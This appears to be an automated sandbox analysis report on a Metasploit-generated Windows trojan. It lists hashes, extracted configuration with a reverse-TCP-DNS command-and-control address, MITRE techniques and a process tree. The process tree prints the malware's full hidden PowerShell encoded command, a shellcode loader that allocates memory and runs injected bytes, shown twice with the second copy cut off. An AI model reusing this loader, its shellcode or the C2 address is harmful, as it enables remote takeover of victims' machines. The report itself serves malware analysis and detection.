metasploit | ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8

General

Target

ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe
Size

17KB
MD5

f8a9322518123f8dfa7e2e4b02e21656
SHA1

0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9
SHA256

ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8
SHA512

fca2e548bb333ac59a4803ab783c5b4bfb466c5f7f59bcb787675db7c4444beafae9fe97beeb272c680f1573f204b864cd06a95cfcfb863e15f4c489732d3bae
SSDEEP

384:OEEoLO56ayzcMj+uZvAc00EUGvQPCcmL6neqlkXMj/79Wx:RE8O56lcVuGv0TPCcfexX+79Wx

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

190.130.88.59:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 7 IoCs

flow	pid	Process
2	2724	powershell.exe
2	2724	powershell.exe
2	2724	powershell.exe
2	2724	powershell.exe
2	2724	powershell.exe
2	2724	powershell.exe
2	2724	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2588	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2588	powershell.exe
2724	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 1972	1728	ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe	32
PID 1728 wrote to memory of 1972	1728	ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe	32
PID 1728 wrote to memory of 1972	1728	ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe	32
PID 1972 wrote to memory of 2588	1972	cmd.exe	33
PID 1972 wrote to memory of 2588	1972	cmd.exe	33
PID 1972 wrote to memory of 2588	1972	cmd.exe	33
PID 2588 wrote to memory of 2724	2588	powershell.exe	34
PID 2588 wrote to memory of 2724	2588	powershell.exe	34
PID 2588 wrote to memory of 2724	2588	powershell.exe	34
PID 2588 wrote to memory of 2724	2588	powershell.exe	34
PID 2724 wrote to memory of 2876	2724	powershell.exe	35
PID 2724 wrote to memory of 2876	2724	powershell.exe	35
PID 2724 wrote to memory of 2876	2724	powershell.exe	35
PID 2724 wrote to memory of 2876	2724	powershell.exe	35
PID 2876 wrote to memory of 2936	2876	csc.exe	36
PID 2876 wrote to memory of 2936	2876	csc.exe	36
PID 2876 wrote to memory of 2936	2876	csc.exe	36
PID 2876 wrote to memory of 2936	2876	csc.exe	36

C:\Users\Admin\AppData\Local\Temp\ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe
"C:\Users\Admin\AppData\Local\Temp\ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA5AFQARAAgAD0AIAAnACQAYgBNAFkASAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABiAE0AWQBIACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAYgBmACwAMAB4ADkANwAsADAAeAA5ADgALAAwAHgANQA1ACwAMAB4ADEAMAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAMAAsADAAeAAzADEALAAwAHgANwBkACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwBkACwAMAB4ADEANgAsADAAeABlADIALAAwAHgANgAyACwAMAB4ADYANAAsADAAeABiAGQALAAwAHgAOQBmACwAMAB4ADgAYwAsADAAeAA5ADUALAAwAHgAMwBlACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgANAA3ACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAZQBmACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgANgBlACwAMAB4ADgANAAsADAAeABjAGEALAAwAHgAMgAwACwAMAB4AGYAYQAsADAAeABjADgALAAwAHgAZgBlACwAMAB4ADAAOQAsADAAeAAwADMALAAwAHgAZQAzACwAMAB4ADQAOQAsADAAeAAyADMALAAwAHgAZABkACwAMAB4ADcAMAAsADAAeABjADcALAAwAHgAOQBjACwAMAB4ADEAMAAsADAAeAA0ADYALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAzADMALAAwAHgAMwBhACwAMAB4AGQANwAsADAAeAAzADUALAAwAHgAOQA0ACwAMAB4ADAAMwAsADAAeAAxADgALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAZQBlACwAMAB4ADIANgAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADcAYQAsADAAeAA5AGEALAAwAHgAZAA0ACwAMAB4ADEANwAsADAAeAAzAGUALAAwAHgAMgA3ACwAMAB4AGQANAAsADAAeABmADcALAAwAHgAMwA0ACwAMAB4ADEANwAsADAAeABhAGUALAAwAHgAYQAwACwAMAB4AGMAZgAsADAAeAA1ADgALAAwAHgAMwBhACwAMAB4ADAAMgAsADAAeABkADEALAAwAHgAOAA4ACwAMAB4ADkAMwAsADAAeAAxADEALAAwAHgAOQA5ACwAMAB4ADMAMAAsADAAeAA5AGYALAAwAHgANwBkACwAMAB4ADMAYQAsADAAeAA0ADAALAAwAHgANABjACwAMAB4AGYAOAAsADAAeABmADMALAAwAHgAMwA2ACwAMAB4ADQAZQAsADAAeAA0AGIALAAwAHgAMwA1ACwAMAB4ADQAOAAsADAAeAAyADUALAAwAHgANwBmACwAMAB4AGIAZQAsADAAeABiADcALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgAMQBiACwAMAB4AGQAMQAsADAAeAA3AGYALAAwAHgAOABkACwAMAB4ADYANQAsADAAeAAxADUALAAwAHgANAA3ACwAMAB4ADYAZQAsADAAeAAxADAALAAwAHgANgBkACwAMAB4AGIANAAsADAAeAAxADMALAAwAHgAMgAzACwAMAB4AGIANgAsADAAeABjADcALAAwAHgAYwBmACwAMAB4AGEANgAsADAAeAAyADkALAAwAHgANgBmACwAMAB4ADkAYgAsADAAeAAxADEALAAwAHgAOABlACwAMAB4ADgAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQANQAsADAAeAA5AGMALAAwAHgAMgA1ACwAMAB4ADgAMwAsADAAeAAwADIALAAwAHgAOAAwACwAMAB4AGIAOAAsADAAeAA0ADAALAAwAHgAMwA5ACwAMAB4AGIAYwAsADAAeAAzADEALAAwAHgANgA3ACwAMAB4AGUAZQAsADAAeAAzADUALAAwAHgAMAAxACwAMAB4ADQAYwAsADAAeAAyAGEALAAwAHgAMQBlACwAMAB4AGQAMQAsADAAeABlAGQALAAwAHgANgBiACwAMAB4AGYAYQAsADAAeABiADQALAAwAHgAMQAyACwAMAB4ADYAYgAsADAAeABhADIALAAwAHgANgA5ACwAMAB4AGIANwAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgAMAA3ACwAMAB4ADkAYgAsADAAeAA4ADAALAAwAHgAOQA1ACwAMAB4ADkAZgAsADAAeAA1ADAALAAwAHgANABkACwAMAB4ADIANgAsADAAeAA2ADAALAAwAHgAZgBlACwAMAB4AGMANgAsADAAeAA1ADUALAAwAHgANQAyACwAMAB4AGEAMQAsADAAeAA3AGMALAAwAHgAZgAyACwAMAB4AGQAZQAsADAAeAAyAGEALAAwAHgANQBiACwAMAB4ADAANQAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4ADEAYgAsADAAeAA5ADkALAAwAHgAZABmACwAMAB4AGEAOQAsADAAeAA1AGMALAAwAHgAYgAzACwAMAB4ADEAYgAsADAAeABmAGQALAAwAHgAMABjACwAMAB4AGEAYgAsADAAeAA4AGEALAAwAHgANwBkACwAMAB4AGMANwAsADAAeAAyAGIALAAwAHgAMwAyACwAMAB4AGEAOAAsADAAeAA0ADgALAAwAHgANwBjACwAMAB4ADkAYwAsADAAeAAwADIALAAwAHgAMgA5ACwAMAB4ADIAYwAsADAAeAA1AGMALAAwAHgAZgAyACwAMAB4AGMAMQAsADAAeAAyADYALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeABmADEALAAwAHgANAA4ACwAMAB4AGIAOQAsADAAeAA0ADYALAAwAHgAMQBhACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgANgA4ACwAMAB4AGQAYgAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADUAOAAsADAAeABmADUALAAwAHgAYwA3ACwAMAB4ADQAOAAsADAAeABhADgALAAwAHgAMgA3ACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAZQA2ACwAMAB4ADAAMgAsADAAeAA1ADkALAAwAHgAZQA3ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYgAxACwAMAB4AGQAMwAsADAAeABkAGUALAAwAHgAZQA5ACwAMAB4ADEANwAsADAAeAA5ADAALAAwAHgAOQBlACwAMAB4ADAAOQAsADAAeABmADIALAAwAHgAYQBkACwAMAB4ADQAZQAsADAAeAA1AGEALAAwAHgAMAAwACwAMAB4AGIAMgAsADAAeAA3AGYALAAwAHgAYwA2ACwAMAB4ADgAZAAsADAAeAA1ADQALAAwAHgAMQA1ACwAMAB4AGUANgAsADAAeABkAGIALAAwAHgAYwBmACwAMAB4ADgAMQAsADAAeAA5AGYALAAwAHgANAAxACwAMAB4ADkAYgAsADAAeAAzADAALAAwAHgANQBmACwAMAB4ADUAYwAsADAAeABlADEALAAwAHgANwAyACwAMAB4AGUAYgAsADAAeAA1ADMALAAwAHgAMQA1ACwAMAB4ADMAYwAsADAAeAAxAGMALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeABhADgALAAwAHgAZQBjACwAMAB4ADUANAAsADAAeAA3ADcALAAwAHgANwBlACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgAMQAyACwAMAB4ADcAZQAsADAAeAA2ADYALAAwAHgANgA5ACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgAMQBlACwAMAB4ADcAMwAsADAAeABlADAALAAwAHgAMQBkACwAMAB4ADgAMQAsADAAeAA4AGMALAAwAHgAYwA3ACwAMAB4ADEANgAsADAAeAAwADgALAAwAHgAMQA5ACwAMAB4AGEAOAAsADAAeAA0ADAALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAAyADgALAAwAHgAOQAwACwAMAB4ADIAMwAsADAAeAA4ADcALAAwAHgAMgA4ACwAMAB4AGYAOAAsADAAeAA5ADMALAAwAHgAZgAzACwAMAB4ADcAYQAsADAAeAAxAGQALAAwAHgAZABjACwAMAB4ADIAOQAsADAAeABlAGYALAAwAHgAOABlACwAMAB4ADQAOQAsADAAeABkADIALAAwAHgANAA2ACwAMAB4ADYAMwAsADAAeABkADkALAAwAHgAYgBhACwAMAB4ADYANAAsADAAeAA1AGEALAAwAHgAMgBkACwAMAB4ADYANQAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGEAZgAsADAAeAA1ADkALAAwAHgANAAxACwAMAB4AGYANwAsADAAeABjADUALAAwAHgAYgAzACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAcQBTAFkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAUwBZAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAFMAWQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADkAVABEACkAKQA7ACQATwAzAFgAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABXAGYATABnACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAZgBMAGcAIAAkAE8AMwBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8AMwBYACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAA5AFQARAAgAD0AIAAnACQAYgBNAFkASAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABiAE0AWQBIACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAYgBmACwAMAB4ADkANwAsADAAeAA5ADgALAAwAHgANQA1ACwAMAB4ADEAMAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAMAAsADAAeAAzADEALAAwAHgANwBkACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwBkACwAMAB4ADEANgAsADAAeABlADIALAAwAHgANgAyACwAMAB4ADYANAAsADAAeABiAGQALAAwAHgAOQBmACwAMAB4ADgAYwAsADAAeAA5ADUALAAwAHgAMwBlACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgANAA3ACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAZQBmACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgANgBlACwAMAB4ADgANAAsADAAeABjAGEALAAwAHgAMgAwACwAMAB4AGYAYQAsADAAeABjADgALAAwAHgAZgBlACwAMAB4ADAAOQAsADAAeAAwADMALAAwAHgAZQAzACwAMAB4ADQAOQAsADAAeAAyADMALAAwAHgAZABkACwAMAB4ADcAMAAsADAAeABjADcALAAwAHgAOQBjACwAMAB4ADEAMAAsADAAeAA0ADYALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAzADMALAAwAHgAMwBhACwAMAB4AGQANwAsADAAeAAzADUALAAwAHgAOQA0ACwAMAB4ADAAMwAsADAAeAAxADgALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAZQBlACwAMAB4ADIANgAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADcAYQAsADAAeAA5AGEALAAwAHgAZAA0ACwAMAB4ADEANwAsADAAeAAzAGUALAAwAHgAMgA3ACwAMAB4AGQANAAsADAAeABmADcALAAwAHgAMwA0ACwAMAB4ADEANwAsADAAeABhAGUALAAwAHgAYQAwACwAMAB4AGMAZgAsADAAeAA1ADgALAAwAHgAMwBhACwAMAB4ADAAMgAsADAAeABkADEALAAwAHgAOAA4ACwAMAB4ADkAMwAsADAAeAAxADEALAAwAHgAOQA5ACwAMAB4ADMAMAAsADAAeAA5AGYALAAwAHgANwBkACwAMAB4ADMAYQAsADAAeAA0ADAALAAwAHgANABjACwAMAB4AGYAOAAsADAAeABmADMALAAwAHgAMwA2ACwAMAB4ADQAZQAsADAAeAA0AGIALAAwAHgAMwA1ACwAMAB4ADQAOAAsADAAeAAyADUALAAwAHgANwBmACwAMAB4AGIAZQAsADAAeABiADcALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgAMQBiACwAMAB4AGQAMQAsADAAeAA3AGYALAAwAHgAOABkACwAMAB4ADYANQAsADAAeAAxADUALAAwAHgANAA3ACwAMAB4ADYAZQAsADAAeAAxADAALAAwAHgANgBkACwAMAB4AGIANAAsADAAeAAxADMALAAwAHgAMgAzACwAMAB4AGIANgAsADAAeABjADcALAAwAHgAYwBmACwAMAB4AGEANgAsADAAeAAyADkALAAwAHgANgBmACwAMAB4ADkAYgAsADAAeAAxADEALAAwAHgAOABlACwAMAB4ADgAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQANQAsADAAeAA5AGMALAAwAHgAMgA1ACwAMAB4ADgAMwAsADAAeAAwADIALAAwAHgAOAAwACwAMAB4AGIAOAAsADAAeAA0ADAALAAwAHgAMwA5ACwAMAB4AGIAYwAsADAAeAAzADEALAAwAHgANgA3ACwAMAB4AGUAZQAsADAAeAAzADUALAAwAHgAMAAxACwAMAB4ADQAYwAsADAAeAAyAGEALAAwAHgAMQBlACwAMAB4AGQAMQAsADAAeABlAGQALAAwAHgANgBiACwAMAB4AGYAYQAsADAAeABiADQALAAwAHgAMQAyACwAMAB4ADYAYgAsADAAeABhADIALAAwAHgANgA5ACwAMAB4AGIANwAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgAMAA3ACwAMAB4ADkAYgAsADAAeAA4ADAALAAwAHgAOQA1ACwAMAB4ADkAZgAsADAAeAA1ADAALAAwAHgANABkACwAMAB4ADIANgAsADAAeAA2ADAALAAwAHgAZgBlACwAMAB4AGMANgAsADAAeAA1ADUALAAwAHgANQAyACwAMAB4AGEAMQAsADAAeAA3AGMALAAwAHgAZgAyACwAMAB4AGQAZQAsADAAeAAyAGEALAAwAHgANQBiACwAMAB4ADAANQAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4ADEAYgAsADAAeAA5ADkALAAwAHgAZABmACwAMAB4AGEAOQAsADAAeAA1AGMALAAwAHgAYgAzACwAMAB4ADEAYgAsADAAeABmAGQALAAwAHgAMABjACwAMAB4AGEAYgAsADAAeAA4AGEALAAwAHgANwBkACwAMAB4AGMANwAsADAAeAAyAGIALAAwAHgAMwAyACwAMAB4AGEAOAAsADAAeAA0ADgALAAwAHgANwBjACwAMAB4ADkAYwAsADAAeAAwADIALAAwAHgAMgA5ACwAMAB4ADIAYwAsADAAeAA1AGMALAAwAHgAZgAyACwAMAB4AGMAMQAsADAAeAAyADYALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeABmADEALAAwAHgANAA4ACwAMAB4AGIAOQAsADAAeAA0ADYALAAwAHgAMQBhACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgANgA4ACwAMAB4AGQAYgAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADUAOAAsADAAeABmADUALAAwAHgAYwA3ACwAMAB4ADQAOAAsADAAeABhADgALAAwAHgAMgA3ACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAZQA2ACwAMAB4ADAAMgAsADAAeAA1ADkALAAwAHgAZQA3ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYgAxACwAMAB4AGQAMwAsADAAeABkAGUALAAwAHgAZQA5ACwAMAB4ADEANwAsADAAeAA5ADAALAAwAHgAOQBlACwAMAB4ADAAOQAsADAAeABmADIALAAwAHgAYQBkACwAMAB4ADQAZQAsADAAeAA1AGEALAAwAHgAMAAwACwAMAB4AGIAMgAsADAAeAA3AGYALAAwAHgAYwA2ACwAMAB4ADgAZAAsADAAeAA1ADQALAAwAHgAMQA1ACwAMAB4AGUANgAsADAAeABkAGIALAAwAHgAYwBmACwAMAB4ADgAMQAsADAAeAA5AGYALAAwAHgANAAxACwAMAB4ADkAYgAsADAAeAAzADAALAAwAHgANQBmACwAMAB4ADUAYwAsADAAeABlADEALAAwAHgANwAyACwAMAB4AGUAYgAsADAAeAA1ADMALAAwAHgAMQA1ACwAMAB4ADMAYwAsADAAeAAxAGMALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeABhADgALAAwAHgAZQBjACwAMAB4ADUANAAsADAAeAA3ADcALAAwAHgANwBlACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgAMQAyACwAMAB4ADcAZQAsADAAeAA2ADYALAAwAHgANgA5ACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgAMQBlACwAMAB4ADcAMwAsADAAeABlADAALAAwAHgAMQBkACwAMAB4ADgAMQAsADAAeAA4AGMALAAwAHgAYwA3ACwAMAB4ADEANgAsADAAeAAwADgALAAwAHgAMQA5ACwAMAB4AGEAOAAsADAAeAA0ADAALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAAyADgALAAwAHgAOQAwACwAMAB4ADIAMwAsADAAeAA4ADcALAAwAHgAMgA4ACwAMAB4AGYAOAAsADAAeAA5ADMALAAwAHgAZgAzACwAMAB4ADcAYQAsADAAeAAxAGQALAAwAHgAZABjACwAMAB4ADIAOQAsADAAeABlAGYALAAwAHgAOABlACwAMAB4ADQAOQAsADAAeABkADIALAAwAHgANAA2ACwAMAB4ADYAMwAsADAAeABkADkALAAwAHgAYgBhACwAMAB4ADYANAAsADAAeAA1AGEALAAwAHgAMgBkACwAMAB4ADYANQAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGEAZgAsADAAeAA1ADkALAAwAHgANAAxACwAMAB4AGYANwAsADAAeABjADUALAAwAHgAYgAzACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAcQBTAFkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAUwBZAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAFMAWQAsADAALAAwACwAMAApADsAZgB